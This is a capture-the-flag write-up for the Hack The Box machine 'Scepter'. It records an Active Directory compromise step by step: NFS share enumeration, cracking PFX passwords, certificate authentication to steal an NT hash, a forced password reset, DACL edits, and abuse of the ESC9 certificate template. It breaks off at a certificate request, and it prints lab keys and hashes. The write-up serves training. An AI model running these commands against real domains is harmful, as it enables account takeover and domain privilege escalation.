HTB | Scepter

Machine - https://app.hackthebox.com/machines/Scepter

IP - 10.10.11.65

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.65 -Pn -oA nmap_ports
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 18:47 IST
Warning: 10.10.11.65 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.65
Host is up (0.44s latency).
Not shown: 33674 closed tcp ports (conn-refused), 31841 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
111/tcp   open  rpcbind
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
636/tcp   open  ldapssl
2049/tcp  open  nfs
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49665/tcp open  unknown
49667/tcp open  unknown
49673/tcp open  unknown
49696/tcp open  unknown
49709/tcp open  unknown
49726/tcp open  unknown
49764/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 169.44 seconds

└─$ nmap -sC -sV -p 53,88,111,135,139,445,464,636,2049,3269,5985,9389,49664,49665,49667,49673,49696,49709,49726,49764 10.10.11.65 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-23 18:51 IST
Nmap scan report for 10.10.11.65
Host is up (0.63s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-23 21:24:31Z)
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-06-23T21:25:51+00:00; +8h02m51s from scanner time.
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after:  2025-11-01T03:22:33
|_ssl-date: 2025-06-23T21:25:52+00:00; +8h02m52s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
49726/tcp open  msrpc         Microsoft Windows RPC
49764/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-06-23T21:25:40
|_  start_date: N/A
|_clock-skew: mean: 8h02m51s, deviation: 0s, median: 8h02m50s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 464.81 seconds

Port 2049

Let’s see the mount

└─$ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)

We can see the helpdesk mount and everyone have the permission to view it

Foothold/shell

Shell as H.Brown

helpdesk mount

Let's mount the helpdesk share and take a look inside.

└─$ sudo mount -t nfs 10.10.11.65:/helpdesk /mnt/         

We can see .crt and .key for baker and .pfx file for clark, lewis and scott

└─$ sudo ls /mnt                                 
baker.crt  baker.key  clark.pfx  lewis.pfx  scott.pfx

Let’s view the certificate of baker

└─# openssl x509 -in baker.crt -text       
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            62:00:00:00:32:e1:a5:c3:91:51:31:09:7b:00:00:00:00:00:32
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA
        Validity
            Not Before: Nov  2 01:13:46 2024 GMT
            Not After : Nov  2 01:13:46 2025 GMT
        Subject: DC=htb, DC=scepter, CN=Users, CN=d.baker, emailAddress=d.baker@scepter.htb
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
                Public-Key: (2048 bit)
                Modulus:
                    00:a5:83:8f:1c:7b:70:f0:2b:08:21:2e:a6:16:4a:
                    08:f0:2b:43:e4:8e:13:bb:7e:89:0d:23:9b:76:76:
                    19:91:9d:5e:29:6f:d5:89:fd:6b:5c:bf:4b:1f:29:
                    0a:84:96:d3:1a:e2:6c:10:34:87:2a:de:e6:62:cd:
                    2b:e3:d2:54:dc:7a:d6:d9:92:28:b2:e2:21:4a:ad:
                    b9:81:ca:a5:ef:7b:67:23:b4:68:09:cf:27:eb:35:
                    19:05:06:a2:10:96:db:5c:08:5c:28:9d:53:91:aa:
                    dc:dd:95:f7:53:d6:87:a0:a9:24:94:c2:61:c8:7d:
                    35:0f:fd:f1:bc:6b:0c:e9:76:c2:14:76:f2:dc:79:
                    a7:c2:8b:8a:a6:1f:7f:6b:b7:b6:5c:fc:a7:1e:76:
                    2f:c1:b5:37:3c:e9:09:3e:6f:8f:e3:92:a8:e6:bd:
                    7c:56:e1:0b:74:72:41:18:e5:71:f7:f6:8e:c6:a4:
                    3d:c1:4d:51:aa:2e:0e:ef:5d:5d:58:07:a7:af:cc:
                    1f:1b:42:14:20:49:b6:86:63:ca:01:f0:09:c3:e7:
                    4a:82:9b:29:7b:d4:ed:51:99:49:b3:43:38:64:b6:
                    bf:c5:d8:5d:c9:29:ab:f6:c9:eb:ca:2a:e0:49:80:
                    fd:28:4c:d6:c7:ed:0d:b2:a6:87:7e:63:35:6a:ab:
                    19:13
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Subject Key Identifier: 
                37:94:CC:57:E3:A4:CB:55:63:1A:47:8F:83:D0:6E:50:C2:34:63:51
            X509v3 Authority Key Identifier: 
                EB:90:54:38:D2:A6:6C:89:6A:CB:6D:4D:A4:BA:75:15:60:15:27:E3
            X509v3 CRL Distribution Points: 
                Full Name:
                  URI:ldap:///CN=scepter-DC01-CA,CN=dc01,CN=CDP,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=scepter,DC=htb?certificateRevocationList?base?objectClass=cRLDistributionPoint

            Authority Information Access: 
                CA Issuers - URI:ldap:///CN=scepter-DC01-CA,CN=AIA,CN=Public%20Key%20Services,CN=Services,CN=Configuration,DC=scepter,DC=htb?cACertificate?base?objectClass=certificationAuthority
            1.3.6.1.4.1.311.20.2: 
                ...U.s.e.r
            X509v3 Key Usage: critical
                Digital Signature, Key Encipherment
            X509v3 Extended Key Usage: 
                Microsoft Encrypted File System, E-mail Protection, TLS Web Client Authentication
            X509v3 Subject Alternative Name: 
                othername: UPN:d.baker@scepter.htb, email:d.baker@scepter.htb
            Microsoft NTDS CA Extension: 
                0<.:.
+.....7....,.*S-1-5-21-74879546-916818434-740295365-1106
            S/MIME Capabilities: 
......0...+....0050...*.H..
..*.H..
    Signature Algorithm: sha256WithRSAEncryption
    Signature Value:
        55:98:3d:9f:d8:f2:64:ac:a3:7c:e2:d6:ab:fb:26:cf:97:89:
        dd:1b:67:a4:81:de:35:11:be:d4:04:97:c0:a0:a9:da:33:2a:
        ea:ca:f3:dc:6d:34:f3:57:45:47:1a:e0:00:0d:bd:43:80:a5:
        a4:40:30:dd:cb:fd:df:b5:ea:6c:f1:7b:d0:c4:0d:6b:c1:51:
        de:eb:55:12:2b:48:bf:3c:eb:01:ab:c3:e6:08:25:01:8c:c4:
        1e:88:2a:71:c6:6e:ee:2d:da:04:14:38:c4:20:b9:fb:17:db:
        a2:94:f6:ac:4c:e9:60:ba:54:7b:a7:61:a3:9e:fb:14:be:01:
        33:04:32:56:3a:1c:27:8d:99:f8:40:fa:8b:c7:da:24:69:5d:
        6b:6e:0c:a1:12:8c:72:46:e5:92:77:a5:8a:38:7d:3e:3b:6b:
        60:ed:01:ce:31:68:df:34:10:26:87:9b:0b:5a:aa:b3:2b:22:
        2f:ad:8f:c0:17:2c:0a:da:0d:52:6d:95:31:4d:6f:cd:3e:b7:
        77:c5:f8:5b:6d:2f:6f:87:8d:c1:bc:3a:9d:6c:a7:02:a4:14:
        b9:6c:4f:7e:d0:88:57:4e:b5:ad:97:fd:5d:6b:a0:24:aa:d7:
        f1:31:84:81:d6:af:9b:b6:b6:44:31:27:17:26:47:c9:9b:6c:
        cf:b4:b5:6a
-----BEGIN CERTIFICATE-----
MIIGTDCCBTSgAwIBAgITYgAAADLhpcORUTEJewAAAAAAMjANBgkqhkiG9w0BAQsF
ADBIMRMwEQYKCZImiZPyLGQBGRYDaHRiMRcwFQYKCZImiZPyLGQBGRYHc2NlcHRl
cjEYMBYGA1UEAxMPc2NlcHRlci1EQzAxLUNBMB4XDTI0MTEwMjAxMTM0NloXDTI1
MTEwMjAxMTM0NlowdDETMBEGCgmSJomT8ixkARkWA2h0YjEXMBUGCgmSJomT8ixk
ARkWB3NjZXB0ZXIxDjAMBgNVBAMTBVVzZXJzMRAwDgYDVQQDEwdkLmJha2VyMSIw
IAYJKoZIhvcNAQkBFhNkLmJha2VyQHNjZXB0ZXIuaHRiMIIBIjANBgkqhkiG9w0B
AQEFAAOCAQ8AMIIBCgKCAQEApYOPHHtw8CsIIS6mFkoI8CtD5I4Tu36JDSObdnYZ
kZ1eKW/Vif1rXL9LHykKhJbTGuJsEDSHKt7mYs0r49JU3HrW2ZIosuIhSq25gcql
73tnI7RoCc8n6zUZBQaiEJbbXAhcKJ1Tkarc3ZX3U9aHoKkklMJhyH01D/3xvGsM
6XbCFHby3HmnwouKph9/a7e2XPynHnYvwbU3POkJPm+P45Ko5r18VuELdHJBGOVx
9/aOxqQ9wU1Rqi4O711dWAenr8wfG0IUIEm2hmPKAfAJw+dKgpspe9TtUZlJs0M4
ZLa/xdhdySmr9snryirgSYD9KEzWx+0NsqaHfmM1aqsZEwIDAQABo4IDATCCAv0w
HQYDVR0OBBYEFDeUzFfjpMtVYxpHj4PQblDCNGNRMB8GA1UdIwQYMBaAFOuQVDjS
pmyJasttTaS6dRVgFSfjMIHKBgNVHR8EgcIwgb8wgbyggbmggbaGgbNsZGFwOi8v
L0NOPXNjZXB0ZXItREMwMS1DQSxDTj1kYzAxLENOPUNEUCxDTj1QdWJsaWMlMjBL
ZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxDTj1Db25maWd1cmF0aW9uLERDPXNj
ZXB0ZXIsREM9aHRiP2NlcnRpZmljYXRlUmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmpl
Y3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCBwQYIKwYBBQUHAQEEgbQwgbEw
ga4GCCsGAQUFBzAChoGhbGRhcDovLy9DTj1zY2VwdGVyLURDMDEtQ0EsQ049QUlB
LENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2VzLENOPUNvbmZp
Z3VyYXRpb24sREM9c2NlcHRlcixEQz1odGI/Y0FDZXJ0aWZpY2F0ZT9iYXNlP29i
amVjdENsYXNzPWNlcnRpZmljYXRpb25BdXRob3JpdHkwFwYJKwYBBAGCNxQCBAoe
CABVAHMAZQByMA4GA1UdDwEB/wQEAwIFoDApBgNVHSUEIjAgBgorBgEEAYI3CgME
BggrBgEFBQcDBAYIKwYBBQUHAwIwQwYDVR0RBDwwOqAjBgorBgEEAYI3FAIDoBUM
E2QuYmFrZXJAc2NlcHRlci5odGKBE2QuYmFrZXJAc2NlcHRlci5odGIwSwYJKwYB
BAGCNxkCBD4wPKA6BgorBgEEAYI3GQIBoCwEKlMtMS01LTIxLTc0ODc5NTQ2LTkx
NjgxODQzNC03NDAyOTUzNjUtMTEwNjBEBgkqhkiG9w0BCQ8ENzA1MA4GCCqGSIb3
DQMCAgIAgDAOBggqhkiG9w0DBAICAIAwBwYFKw4DAgcwCgYIKoZIhvcNAwcwDQYJ
KoZIhvcNAQELBQADggEBAFWYPZ/Y8mSso3zi1qv7Js+Xid0bZ6SB3jURvtQEl8Cg
qdozKurK89xtNPNXRUca4AANvUOApaRAMN3L/d+16mzxe9DEDWvBUd7rVRIrSL88
6wGrw+YIJQGMxB6IKnHGbu4t2gQUOMQgufsX26KU9qxM6WC6VHunYaOe+xS+ATME
MlY6HCeNmfhA+ovH2iRpXWtuDKESjHJG5ZJ3pYo4fT47a2DtAc4xaN80ECaHmwta
qrMrIi+tj8AXLAraDVJtlTFNb80+t3fF+FttL2+HjcG8Op1spwKkFLlsT37QiFdO
ta2X/V1roCSq1/ExhIHWr5u2tkQxJxcmR8mbbM+0tWo=
-----END CERTIFICATE-----

Let’s take a look at the key

└─# cat baker.key             
Bag Attributes
    friendlyName: 
    localKeyID: DC 2B 20 65 C3 0D 91 40 E8 37 B5 CC 06 0F EA 66 5D 3B 7C 4E 
Key Attributes: <No Attributes>
-----BEGIN ENCRYPTED PRIVATE KEY-----
MIIFNTBfBgkqhkiG9w0BBQ0wUjAxBgkqhkiG9w0BBQwwJAQQ17OfpdLR0GFTqV4d
KoDehgICCAAwDAYIKoZIhvcNAgkFADAdBglghkgBZQMEASoEEEcu2qznlHlXQqAg
xOEmzdQEggTQHj6+lbqr5wQXN8Oqxe57h5vuA8ihIcIte/gpDRNnIzvLDvmQ3gSr
JE51d0E4VhzxcSYH43m3X64GQ8mkESOuoKh5JhwX5+vWHvbKM18komfpX4MHhe0J
wblo8Dhc3j2BSuhRoYpG9mJwSdATYFwxlYnWF5499bDHGkPnOPkR08C/FRyW1QhJ
qyMGNLnJ9IxlWySY+Fm/0RQOyu4hS0u87OLoglW9OIhDfu6rz0QdDWIs+1dQxrwE
a6OBdL+q38NSK6H2cBopCYTtyGw/Okzl5+Lrn411a2HdpT8JjXinTNZMtn9hww6U
MqqMUYzXG6zfBQ/vSoutIW0/Wkg5b4BVK/wW/EFh6vcBlWVk0CdXz8kScsWx7KF4
4yqKTN/aWGfvYx2DWW17cGzUsOvAmW1OXgu2YBYVAjs6vbXYzJyqzTKIlsSKmnP+
wzaoxgAsT/QtEAHppMDIW0jEDpYDcRvRi5//Ejpdbz3XETvEXFj1OEpWVwWTxZSM
tiEjCRJU/btiRsXoB1p1mvHEA1RyO+XX93yX5WRbFUB+5t9t8XrVCsUt1JfFNdVa
mC4BhzAInFgut74NiIQ7vbe3OlNsse0ZWtfwof4mzb4U1e7dCffD0IoKXLxZhszd
Cave8eNaHYi6N7wO5ActNp5HhQFhtogTSe99NHnE41zRHTcejsFsUQS/mpzubUXj
aGkTt5uPRJXuw5+jcxpZOvXKb6qDdJUSCa/Od4fGgmQGtaKBr/XIciQg/K96CBUH
ayp6WcBcAwtTZeUQJM/V/qheHtipsJjuJzeBi35IitpafblcrKMSmtIKE972b5fD
X0NdnDCSrNZeTXNYC4BN2+t4h1QP1heWU2jfzNLAcDoD+aUrpW/JCEGwMzOe6MTC
c/h3NCYOcPvcc3L20wXOtYOjp6gzDdp2JliW+n6QUxm7fJo/AUtGGSknziZ3VbMc
fqC4vbPy88d2fHt9QWmIOmjpMpwZObotA8rMpg41FxsXQq9mqZy08tppF6T0DdwY
A8soic4SbMpUAuuAz9WJRwKtHwlGoJNtBrLfrVKsUnO/FGZpDOYyIRCBMlMyI6u2
LPLVkRIJx+tajQhkzhfTmdx6CQUmeaJU2wL92fY1jqTeRcm2T70TVHKZk2spcaGp
lVcRgWdFAz52JHNCfVjCfJ6dRbVPxbSC2vHN/YJa8LcQA0RGgKxoh1sRC/3HHFQz
wtJ/xnp/dk4YsntrUOgr8/mcjYqQh7WqRzHFYG/VE2Ipy3XT6iONi23ggiAWP9KV
e0cRcPSwjN4FzQH+fX3rf1x8YcQI9UricqxI2IM3Q9dDkZhMz4yjStO2XGpOo5od
AiOTySb9tflvKZOggXKZE1Eo7lHpWYfKt7baQlUEFb2RslA0JjBtJ8fdJqdHW1+8
3o8QN4AJtYqNDB6dHaxMmwG7L1WnCMofbGDxlK+bdsgr3BapXt0n6+JXA6iS7i8J
wYTlDp5UYXTT87fUGejNBXhCsJODZJGQxVjxl5JMhmaLbvFNW0YDAZe8WnX7LsYp
7X+ajbc3hOSIIU1JOufrGWQxVvkoFdXcRBG9L15Uwsrpfzr2CA5J3kRMBxuZQnjJ
90yWTwKFUUj3pzCG2WyraNJn44jo3sFJzoUhyUKUYfn2lMtnwOvw//A=
-----END ENCRYPTED PRIVATE KEY-----

attempting to authenticate via pfx

Since we have Clark, Lewis and Scott PFX files, we can try to authenticate

First, convert them into hash and use John to crack them

└─$ pfx2john lewis.pfx | tee -a lewishash
└─$ pfx2john clark.pfx | tee -a clarkhash
└─$ pfx2john scott.pfx| tee -a scotthash

┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john lewishash --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (lewis.pfx)     
1g 0:00:00:00 DONE (2025-06-23 19:45) 2.173g/s 11686p/s 11686c/s 11686C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john clarkhash --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (clark.pfx)     
1g 0:00:00:00 DONE (2025-06-23 19:45) 2.500g/s 13440p/s 13440c/s 13440C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
                                                                                                                                                                                                                                                                             
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ john scotthash --wordlist=/home/anurag/stuff/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 256 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
newpassword      (scott.pfx)     
1g 0:00:00:00 DONE (2025-06-23 19:46) 1.923g/s 10338p/s 10338c/s 10338C/s Liverpool..ginuwine
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

I was not able to authenticate via Clark, Lewis and Scott PFX files

Let’s make PFX for baker

PFX for baker

When prompted for passphrase, we can provide the password of clark, lewos and scott pfx and when prompt for export password let’s keep it empty

└─$ openssl pkcs12 -export -out baker.pfx -inkey baker.key -in baker.crt                          
Enter pass phrase for baker.key:
Enter Export Password:
Verifying - Enter Export Password:

Let’s change the permission for pfx

chmod 700 baker.pfx

Now we can use certipy to get the hash from the pfx

└─$ certipy auth -pfx baker.pfx -dc-ip 10.10.11.65
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'd.baker@scepter.htb'
[*]     Security Extension SID: 'S-1-5-21-74879546-916818434-740295365-1106'
[*] Using principal: 'd.baker@scepter.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'd.baker.ccache'
[*] Wrote credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce

We can successfully authenticate via this hash

└─$ netexec ldap 10.10.11.65 -u d.baker -H 18b5fb0d99e7a475316213c15b6f22ce
LDAP        10.10.11.65     389    DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:scepter.htb)
LDAP        10.10.11.65     389    DC01             [+] scepter.htb\d.baker:18b5fb0d99e7a475316213c15b6f22ce                                                                                       

Bloodhound

Since we authenticate as ldap we can use bloodhound-python

└─$ bloodhound-python -u 'd.baker' --hashes :18b5fb0d99e7a475316213c15b6f22ce -d Scepter.htb -ns 10.10.11.65 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 01M 22S
INFO: Compressing output into 20250624042828_bloodhound.zip

We can see D.BAKER@SCEPTER.HTB -> ForceChangePassword -> A.CATER@SCEPTOR.HTB

ForceChangePassword

We will change the password for a.carter

└─$ bloodyAD --host 10.10.11.65 -d scepter.htb -u d.baker -p :18b5fb0d99e7a475316213c15b6f22ce set password a.carter 'P@ssw0rd@123'
[+] Password changed successfully!

└─$ netexec smb 10.10.11.65 -u a.carter -p 'P@ssw0rd@123'
SMB         10.10.11.65     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:scepter.htb) (signing:True) (SMBv1:False) 
SMB         10.10.11.65     445    DC01             [+] scepter.htb\a.carter:P@ssw0rd@123 

Bloodhound again with new cred

GenericALL

We can see A.CARTER@SCEPTER.HTB -> MemberOf -> IT SUPPORT@SCEPTER.HTB -> GenericAll -> STAFF ACCESS CERTIFICATE@SCEPTER.HTB

grant a.carter full control (GenericAll) over the Organizational Unit (OU) called STAFF ACCESS CERTIFICATE By giving a.carter GenericAll on that OU:

• You gain the ability to abuse ADCS (Active Directory Certificate Services).

• You can impersonate users via certificates.

A Staff Access Certificate, in the context of AD CS, is a certificate issued to individual staff members to grant them access to specific resources or applications within the organization's network. These certificates are typically used for authentication purposes, allowing staff to prove their identity and gain access to authorized areas.

└─$ bloodyAD --host 10.10.11.65 -d scepter.htb -u a.carter -p 'P@ssw0rd@123' add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB

ESC9

I try to find ADCS vulnerability so I tried with .carter and d.baker, both we found ESC9 from Baker’s cred

└─$ certipy find -u d.baker -hashes :18b5fb0d99e7a475316213c15b6f22ce -target 10.10.11.65 -text -stdout -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 20 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'scepter-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'scepter-DC01-CA'
[*] Checking web enrollment for CA 'scepter-DC01-CA' @ 'dc01.scepter.htb'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : scepter-DC01-CA
    DNS Name                            : dc01.scepter.htb
    Certificate Subject                 : CN=scepter-DC01-CA, DC=scepter, DC=htb
    Certificate Serial Number           : 716BFFE1BE1CD1A24010F3AD0E350340
    Certificate Validity Start          : 2024-10-31 22:24:19+00:00
    Certificate Validity End            : 2061-10-31 22:34:19+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SCEPTER.HTB\Administrators
      Access Rights
        ManageCa                        : SCEPTER.HTB\Administrators
                                          SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        ManageCertificates              : SCEPTER.HTB\Administrators
                                          SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Enterprise Admins
        Enroll                          : SCEPTER.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : StaffAccessCertificate
    Display Name                        : StaffAccessCertificate
    Certificate Authorities             : scepter-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireEmail
                                          SubjectRequireDnsAsCn
                                          SubjectRequireEmail
    Enrollment Flag                     : AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 99 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-11-01T02:29:00+00:00
    Template Last Modified              : 2024-11-01T09:00:54+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SCEPTER.HTB\staff
      Object Control Permissions
        Owner                           : SCEPTER.HTB\Enterprise Admins
        Full Control Principals         : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Owner Principals          : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
        Write Dacl Principals           : SCEPTER.HTB\Domain Admins
                                          SCEPTER.HTB\Local System
                                          SCEPTER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : SCEPTER.HTB\staff
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

and we have GenericAll on StaffAccessCertificate, also, we can see

Certificate Name Flag : SubjectAltRequireEmail

Since a.carter have GenericAll on STAFF ACCESS CERTIFICATE@SCEPTER.HTB and we want d.baker to have that access we can use impacket-dacledit with -inheritance to get FullControl over d.baker, who is also a member of STAFF ACCESS CERTIFICATE OU

└─$ impacket-dacledit -action write -rights FullControl -principal a.carter -target-dn 'OU=Staff Access Certificate,DC=scepter,DC=htb' -dc-ip 10.10.11.65 specter.htb/a.carter:'P@ssw0rd@123' -inheritance
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20250624-195325.bak
[*] DACL modified successfully!

Feature	bloodyAD GenericAll	impacket-dacledit with -inheritance
Affects Only Target Object	✅ Yes	✅ Yes
Affects Child Objects	❌ No	✅ Yes (if -inheritance used and not blocked)
Grants Access Type	GenericAll (standard right)	Custom ACL entry (FullControl, but customizable)
Method Used	Direct AD right via DACL	Explicit ACL modification via DACL
AdminCount Bypass Warning	❌ No warning	⚠️ Warns about adminCount=1 (inhibits inheritance)

Now we need to set the email of controlled account to that of target

Let’s try for administrator

dn: CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb
changetype: modify
replace: mail
mail: administrator@scepter.htb
                                                                                                                                                                                                                                                                              
┌──(anurag㉿anurag)-[~/htb/Scepter]
└─$ ldapmodify -x -H ldap://10.10.11.65 -D 'scepter\a.carter' -w 'P@ssw0rd@123' -f administrator_mail.ldif 
modifying entry "CN=d.baker,OU=Staff Access Certificate,DC=scepter,DC=htb"

now we can request the pfx

─$ certipy req -username d.baker@scepter.htb -hashes :18b5fb0d99e7a475316213c15b6f22ce -ca scepter-DC01-CA -template StaffAccessCertificate
